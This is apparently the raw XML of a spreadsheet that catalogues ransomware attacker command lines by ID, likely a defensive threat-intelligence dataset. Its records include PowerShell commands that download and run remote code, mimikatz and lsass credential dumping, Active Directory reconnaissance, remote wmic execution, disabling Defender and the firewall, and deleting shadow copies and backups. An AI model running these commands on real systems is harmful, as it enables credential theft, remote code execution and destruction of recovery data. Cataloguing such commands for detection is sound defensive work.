    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1261"/>
    <m/>
    <m/>
    <s v="ipconfig /all"/>
    <s v="rundll32  c:\users\&lt;&gt;\AppData\Local\Temp\easygoing.data,#1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1262"/>
    <m/>
    <m/>
    <s v="adget.exe ad.zip"/>
    <s v="rundll32  c:\users\&lt;&gt;\AppData\Local\Temp\easygoing.data,#1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1043"/>
    <m/>
    <m/>
    <s v="powershell.exe -executionpolicy bypass -nop -w hidden -enc &lt;encoded&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="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18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18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18"/>
  </r>
  <r>
    <s v="ransom-eid1272"/>
    <m/>
    <m/>
    <s v="&quot;C:\Windows\System32\cmd.exe /c &quot;D:\max\eyewear.bat&quot;"/>
    <s v="&quot;C:\Windows\Explorer.EXE&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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12"/>
  </r>
  <r>
    <s v="ransom-eid1274"/>
    <m/>
    <m/>
    <s v="rundll32 C:\Users\[REDACTED]\AppData\Local\Temp\easygoing.dat,#1"/>
    <s v="C:\Windows\system32\cmd.exe /c D:\max\eyewear.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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12"/>
  </r>
  <r>
    <s v="ransom-eid1269"/>
    <m/>
    <m/>
    <s v="cmd.exe /c powershell.exe Add-WindowsCapability -online -Name &quot;Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1277"/>
    <m/>
    <m/>
    <s v="c:\Users\&lt;&gt;\Downloads\lsass.exe"/>
    <s v="C:Windows\Explorer.EXE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1278"/>
    <m/>
    <m/>
    <s v="powerhsell -nop -exec bypass -EncodedCommand &lt;Encoded string&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1279"/>
    <m/>
    <m/>
    <s v="IEX (New-Object Net.Webclient).DownloadString('http://&lt;IP&gt;:&lt;port&gt;/'); Open-HiddenInternetExplorer"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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12"/>
  </r>
  <r>
    <s v="ransom-eid1270"/>
    <m/>
    <m/>
    <s v="cmd.exe /C powershell.exe Get-ADComputer -Filter * -Properties * | Export-CSV &quot;C:\ProgramData\ADComputers.csv&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1282"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C mimikatz.exe &quot;privilege::debug&quot; &quot;sekurlsa::logonpasswords&quot; &quot;exit&quot; &gt;&gt; c:\programdata\mimikatz\creds.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1283"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C mimikatz.exe privilege::debug sekurlsa::logonPasswords full samdump::hashes exit &gt; &quot;c:\programdata\creds.txt&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1271"/>
    <m/>
    <m/>
    <s v="cmd.exe /C powershell.exe Get-ADComputer -Filter * -Properties * -Path | Export-CSV &quot;C:\ProgramData\ADComputers.csv&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1285"/>
    <m/>
    <m/>
    <s v="c:\windows\temp\procdump64.exe -accepteula -ma lsass.exe fwtsqmfile00.dmp"/>
    <s v="C:\Windows\SysWOW64\rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1286"/>
    <m/>
    <m/>
    <s v="systeminfo"/>
    <s v="rundll32  c:\users\&lt;&gt;\AppData\Local\Temp\easygoing.data,#1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1287"/>
    <m/>
    <m/>
    <s v="netstat -anop tcp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1288"/>
    <m/>
    <m/>
    <s v="cmd.exe /C echo %%temp%%"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1289"/>
    <m/>
    <m/>
    <s v="cmd.exe /C hostname"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1290"/>
    <m/>
    <m/>
    <s v="cmd.exe /C nslookup hostname"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1276"/>
    <m/>
    <m/>
    <s v="powershell iex((new-object net.webclient).downloadstring('https://textbin.net/&lt;random&gt;))"/>
    <s v="C:windows\system32\cmd.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1281"/>
    <m/>
    <m/>
    <s v="powershell.exe Uninstall-WindowsFeature -Name Windows-Defender-GUI"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1284"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe powershell -ep bypass -C &quot;import-module .\katz.ps1;Invoke-Katz&quot; &gt; mimi.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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12"/>
  </r>
  <r>
    <s v="ransom-eid1292"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C powershell.exe Get-Help Export-CSV"/>
    <m/>
    <m/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1293"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C powershell.exe Get-Help Get-ADComputer"/>
    <m/>
    <m/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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1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12"/>
  </r>
  <r>
    <s v="ransom-eid1299"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C dir /s *file/ Microsoft.ActiveDirectory.Management.dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1300"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C where /r C:\Windows\WinSxS\ *Microsoft.ActiveDirectory.Management.dll*"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1301"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C nslook up [REDACTED]"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1302"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C nslookup USERFirstName UserLastName"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1305"/>
    <m/>
    <s v="Cobalt Strike in wrong terminal"/>
    <s v="C:\Windows\system32\cmd.exe /c dcsync"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1306"/>
    <m/>
    <m/>
    <s v="Invoke-ShareFinder"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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1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12"/>
  </r>
  <r>
    <s v="ransom-eid1297"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C powershell.exe Get-ADComputer -Identity [REDACTED] -Properties *"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1310"/>
    <m/>
    <m/>
    <s v="find.exe -f objectcategory=computer"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1311"/>
    <m/>
    <m/>
    <s v="find.exe -f (objectcategory=person)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1312"/>
    <m/>
    <m/>
    <s v="find.exe -f (objectcategory=organizationalUnit)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1313"/>
    <m/>
    <m/>
    <s v="find.exe -subnets -f (objectCategory=subnet)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1314"/>
    <m/>
    <m/>
    <s v="find.exe -f &quot;(objectcategory=group)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1315"/>
    <m/>
    <m/>
    <s v="find.exe -gcb -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1316"/>
    <m/>
    <m/>
    <s v="find.exe -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1317"/>
    <m/>
    <m/>
    <s v="for /f &quot;delims=&quot; %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set &quot;var=%%A&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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1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1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1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1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12"/>
  </r>
  <r>
    <s v="ransom-eid1309"/>
    <m/>
    <m/>
    <s v="powershell -nop -exec bypass -EncodedCommand &lt;encode&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1335"/>
    <m/>
    <m/>
    <s v="ipconfig /all"/>
    <s v="regsvr32.exe C:\users\&lt;&gt;\AppData\Local\&lt;rstring&gt;\&lt;random&gt;.dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1337"/>
    <m/>
    <m/>
    <s v="&lt;rstring&gt;.exe"/>
    <s v="regsvr32.exe C:\users\&lt;&gt;\AppData\Local\&lt;rstring&gt;\&lt;random&gt;.dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32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2"/>
  </r>
  <r>
    <s v="ransom-eid1339"/>
    <m/>
    <m/>
    <s v="whoami /groups"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1347"/>
    <m/>
    <m/>
    <s v="find.exe -f objectcategory=computer"/>
    <s v="c:\windows\system32\cmd.exe /c find.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1348"/>
    <m/>
    <m/>
    <s v="find.exe -f (objectcategory=person)"/>
    <s v="c:\windows\system32\cmd.exe /c find.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1349"/>
    <m/>
    <m/>
    <s v="find.exe -f (objectcategory=organizationalUnit)"/>
    <s v="c:\windows\system32\cmd.exe /c find.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1350"/>
    <m/>
    <m/>
    <s v="find.exe -subnets -f (objectCategory=subnet)"/>
    <s v="c:\windows\system32\cmd.exe /c find.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1351"/>
    <m/>
    <m/>
    <s v="find.exe -f &quot;(objectcategory=group)&quot;"/>
    <s v="c:\windows\system32\cmd.exe /c find.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1352"/>
    <m/>
    <m/>
    <s v="find.exe -gcb -sc trustdmp"/>
    <s v="c:\windows\system32\cmd.exe /c find.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1353"/>
    <m/>
    <m/>
    <s v="find.exe -sc trustdmp"/>
    <s v="c:\windows\system32\cmd.exe /c find.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1354"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\mstsc mstsc.exe /v:IP_ADDRESS_1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1355"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\mstsc mstsc.exe /v:IP_ADDRESS_2"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1356"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\explorer.exe &quot;C:\Windows\SysWOW64\explorer.exe&quot; \\IP_ADDRESS_1\C$"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1357"/>
    <m/>
    <m/>
    <s v="ping &lt;HOST_IP&gt; -n 1"/>
    <s v="c:\windows\system32\cmd.exe /c bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1358"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="wmic /node:IP_Address process call create &quot;cmd.exe /c start C:\Progradata\sc_https_x64.exe&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32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2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2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2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2"/>
  </r>
  <r>
    <s v="ransom-eid1363"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="wmic.exe process call create 'regsvr32 -s C:\Users\Public\microsoft.security'"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="ransom-eid1364"/>
    <m/>
    <m/>
    <s v="regsvr32 -s C:\Users\Public\Microsoft.security"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="ransom-eid1365"/>
    <m/>
    <m/>
    <s v="rundll32.exe &quot;C:\Users\USERNAME\AppData\Local\Temp\skull-x64.dat&quot;,update /i:&quot;DwarfWing\license.dat&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="ransom-eid1366"/>
    <m/>
    <m/>
    <s v="HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*AstraZeneca"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="ransom-eid1367"/>
    <m/>
    <m/>
    <s v="cmd.exe /c chcp &gt;&amp;2"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="ransom-eid1368"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="ransom-eid1369"/>
    <m/>
    <m/>
    <s v="ipconfig.exe ipconfig /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="ransom-eid1370"/>
    <m/>
    <m/>
    <s v="systeminfo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13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13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13"/>
  </r>
  <r>
    <s v="ransom-eid1380"/>
    <m/>
    <m/>
    <s v="bcdedit /set {current} safeboot network"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="ransom-eid1381"/>
    <m/>
    <m/>
    <s v="netsh firewall set opmode disable"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="33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3"/>
  </r>
  <r>
    <s v="ransom-eid1385"/>
    <m/>
    <m/>
    <s v="vssadmin delete shadows /all /quiet"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="33"/>
  </r>
  <r>
    <s v="ransom-eid1386"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="wmic shadowcopy delete"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="33"/>
  </r>
  <r>
    <s v="ransom-eid1387"/>
    <m/>
    <m/>
    <s v="bcdedit /set {default} bootstatuspolicy ignoreallfailures"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="33"/>
  </r>
  <r>
    <s v="ransom-eid1388"/>
    <m/>
    <m/>
    <s v="bcdedit /set {default} recoveryenabled no"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="33"/>
  </r>
  <r>
    <s v="ransom-eid1389"/>
    <m/>
    <m/>
    <s v="wbadmin delete catalog -quiet"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m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4"/>
        <item x="15"/>
        <item x="20"/>
        <item x="0"/>
        <item x="16"/>
        <item x="21"/>
        <item x="1"/>
        <item x="22"/>
        <item x="2"/>
        <item x="3"/>
        <item x="23"/>
        <item x="4"/>
        <item x="24"/>
        <item x="25"/>
        <item x="5"/>
        <item x="6"/>
        <item x="7"/>
        <item m="1" x="37"/>
        <item x="26"/>
        <item x="17"/>
        <item x="27"/>
        <item x="28"/>
        <item x="19"/>
        <item x="29"/>
        <item x="35"/>
        <item x="30"/>
        <item x="31"/>
        <item x="34"/>
        <item x="8"/>
        <item x="9"/>
        <item x="18"/>
        <item x="10"/>
        <item x="11"/>
        <item x="12"/>
        <item m="1" x="36"/>
        <item x="32"/>
        <item x="13"/>
        <item x="33"/>
        <item t="default"/>
      </items>
    </pivotField>
  </pivotFields>
  <rowFields count="1">
    <field x="1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1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38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37"/>
        <item x="34"/>
        <item x="35"/>
        <item x="36"/>
        <item t="default"/>
      </items>
    </pivotField>
  </pivotFields>
  <rowFields count="1">
    <field x="7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392" totalsRowShown="0" headerRowDxfId="23">
  <autoFilter ref="A1:L1392" xr:uid="{B6B8DB85-BB20-8546-B15A-D0F5310E33C2}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:L1392">
    <sortCondition ref="B1:B1392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1" totalsRowShown="0" headerRowDxfId="17">
  <autoFilter ref="A1:K21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110" totalsRowShown="0" headerRowDxfId="14">
  <autoFilter ref="A1:J110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10" totalsRowShown="0" headerRowDxfId="2">
  <autoFilter ref="A1:H310" xr:uid="{1E1F5E3D-3834-1C40-AC33-C82C745B36BB}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:H310">
    <sortCondition ref="D1:D310"/>
  </sortState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392"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="B806" sqref="B806:B808"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="14.33203125" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="22.83203125" style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79</v>
      </c>
      <c r="I1" s="5" t="s">
        <v>80</v>
      </c>
      <c r="J1" s="4" t="s">
        <v>3127</v>
      </c>
      <c r="K1" s="4" t="s">
        <v>97</v>
      </c>
      <c r="L1" s="5" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A2" s="1" t="s">
        <v>1388</v>
      </c>
      <c r="B2" t="s">
        <v>3134</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>304</v>
      </c>
      <c r="E2" s="1"/>
      <c r="L2" s="1" t="s">
        <v>287</v>
      </c>
    </row>
    <row r="3" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A3" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="B3" t="s">
        <v>3134</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>305</v>
      </c>
      <c r="E3" s="1"/>
      <c r="L3" s="1" t="s">
        <v>287</v>
      </c>
    </row>
    <row r="4" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A4" s="1" t="s">
        <v>1390</v>
      </c>
      <c r="B4" t="s">
        <v>3134</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>306</v>
      </c>
      <c r="E4" s="1"/>
      <c r="L4" s="1" t="s">
        <v>287</v>
      </c>
    </row>
    <row r="5" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A5" s="1" t="s">
        <v>1391</v>
      </c>
      <c r="B5" t="s">
        <v>3134</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>307</v>
      </c>
      <c r="E5" s="1"/>
      <c r="L5" s="1" t="s">
        <v>287</v>
      </c>
    </row>
    <row r="6" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A6" s="1" t="s">
        <v>1392</v>
      </c>
      <c r="B6" t="s">
        <v>3134</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>308</v>
      </c>
      <c r="E6" s="1"/>
      <c r="L6" s="1" t="s">
        <v>287</v>
      </c>
    </row>
    <row r="7" spans="1:12" ht="35" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A7" s="1" t="s">
        <v>1393</v>
      </c>
      <c r="B7" t="s">
        <v>3134</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>309</v>
      </c>
      <c r="E7" s="1"/>
      <c r="L7" s="1" t="s">
        <v>287</v>
      </c>
    </row>
    <row r="8" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A8" s="1" t="s">
        <v>1394</v>
      </c>
      <c r="B8" t="s">
        <v>3134</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>310</v>
      </c>
      <c r="E8" s="1"/>
      <c r="L8" s="1" t="s">
        <v>287</v>
      </c>
    </row>
    <row r="9" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A9" s="1" t="s">
        <v>1395</v>
      </c>
      <c r="B9" t="s">
        <v>3134</v>
      </c>
      <c r="D9" s="1" t="s">
        <v>311</v>
      </c>
      <c r="E9" s="1"/>
      <c r="L9" s="1" t="s">
        <v>287</v>
      </c>
    </row>
    <row r="10" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A10" s="1" t="s">
        <v>1498</v>
      </c>
      <c r="B10" t="s">
        <v>3134</v>
      </c>
      <c r="D10" s="1" t="s">
        <v>468</v>
      </c>
      <c r="E10" s="1"/>
      <c r="L10" s="1" t="s">
        <v>424</v>
      </c>
    </row>
    <row r="11" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A11" s="1" t="s">
        <v>1499</v>
      </c>
      <c r="B11" t="s">
        <v>3134</v>
      </c>
      <c r="D11" s="1" t="s">
        <v>469</v>
      </c>
      <c r="E11" s="1"/>
      <c r="L11" s="1" t="s">
        <v>424</v>
      </c>
    </row>
    <row r="12" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A12" s="1" t="s">
        <v>1500</v>
      </c>
      <c r="B12" t="s">
        <v>3134</v>
      </c>
      <c r="D12" s="1" t="s">
        <v>470</v>
      </c>
      <c r="E12" s="1"/>
      <c r="L12" s="1" t="s">
        <v>424</v>
      </c>
    </row>
    <row r="13" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A13" s="1" t="s">
        <v>1501</v>
      </c>
      <c r="B13" t="s">
        <v>3134</v>
      </c>
      <c r="D13" s="1" t="s">
        <v>471</v>
      </c>
      <c r="E13" s="1"/>
      <c r="L13" s="1" t="s">
        <v>424</v>
      </c>
    </row>
    <row r="14" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A14" s="1" t="s">
        <v>1502</v>
      </c>
      <c r="B14" t="s">
        <v>3134</v>
      </c>
      <c r="D14" s="1" t="s">
        <v>472</v>
      </c>
      <c r="E14" s="1"/>
      <c r="L14" s="1" t="s">
        <v>424</v>
      </c>
    </row>
    <row r="15" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A15" s="1" t="s">
        <v>1503</v>
      </c>
      <c r="B15" t="s">
        <v>3134</v>
      </c>
      <c r="D15" s="1" t="s">
        <v>473</v>
      </c>
      <c r="E15" s="1"/>
      <c r="L15" s="1" t="s">
        <v>424</v>
      </c>
    </row>
    <row r="16" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A16" s="1" t="s">
        <v>1504</v>
      </c>
      <c r="B16" t="s">
        <v>3134</v>
      </c>
      <c r="D16" s="1" t="s">
        <v>474</v>
      </c>
      <c r="E16" s="1"/>
      <c r="L16" s="1" t="s">
        <v>424</v>
      </c>
    </row>
    <row r="17" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A17" s="1" t="s">
        <v>1555</v>
      </c>
      <c r="B17" t="s">
        <v>3134</v>
      </c>
      <c r="D17" s="1" t="s">
        <v>304</v>
      </c>
      <c r="E17" s="1"/>
      <c r="L17" s="1" t="s">
        <v>510</v>
      </c>
    </row>
    <row r="18" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A18" s="1" t="s">
        <v>1556</v>
      </c>
      <c r="B18" t="s">
        <v>3134</v>
      </c>
      <c r="D18" s="1" t="s">
        <v>520</v>
      </c>
      <c r="E18" s="1"/>
      <c r="L18" s="1" t="s">
        <v>510</v>
      </c>
    </row>
    <row r="19" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A19" s="1" t="s">
        <v>1557</v>
      </c>
      <c r="B19" t="s">
        <v>3134</v>
      </c>
      <c r="D19" s="1" t="s">
        <v>521</v>
      </c>
      <c r="E19" s="1"/>
      <c r="L19" s="1" t="s">
        <v>510</v>
      </c>
    </row>
    <row r="20" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A20" s="1" t="s">
        <v>1558</v>
      </c>
      <c r="B20" t="s">
        <v>3134</v>
      </c>
      <c r="D20" s="1" t="s">
        <v>522</v>
      </c>
      <c r="E20" s="1"/>
      <c r="L20" s="1" t="s">
        <v>510</v>
      </c>
    </row>
    <row r="21" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A21" s="1" t="s">
        <v>1559</v>
      </c>
      <c r="B21" t="s">
        <v>3134</v>
      </c>
      <c r="D21" s="1" t="s">
        <v>308</v>
      </c>
      <c r="E21" s="1"/>
      <c r="L21" s="1" t="s">
        <v>510</v>
      </c>
    </row>
    <row r="22" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A22" s="1" t="s">
        <v>1560</v>
      </c>
      <c r="B22" t="s">
        <v>3134</v>
      </c>
      <c r="D22" s="1" t="s">
        <v>523</v>
      </c>
      <c r="E22" s="1"/>
      <c r="L22" s="1" t="s">
        <v>510</v>
      </c>
    </row>
    <row r="23" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A23" s="1" t="s">
        <v>1561</v>
      </c>
      <c r="B23" t="s">
        <v>3134</v>
      </c>
      <c r="D23" s="1" t="s">
        <v>307</v>
      </c>
      <c r="E23" s="1"/>
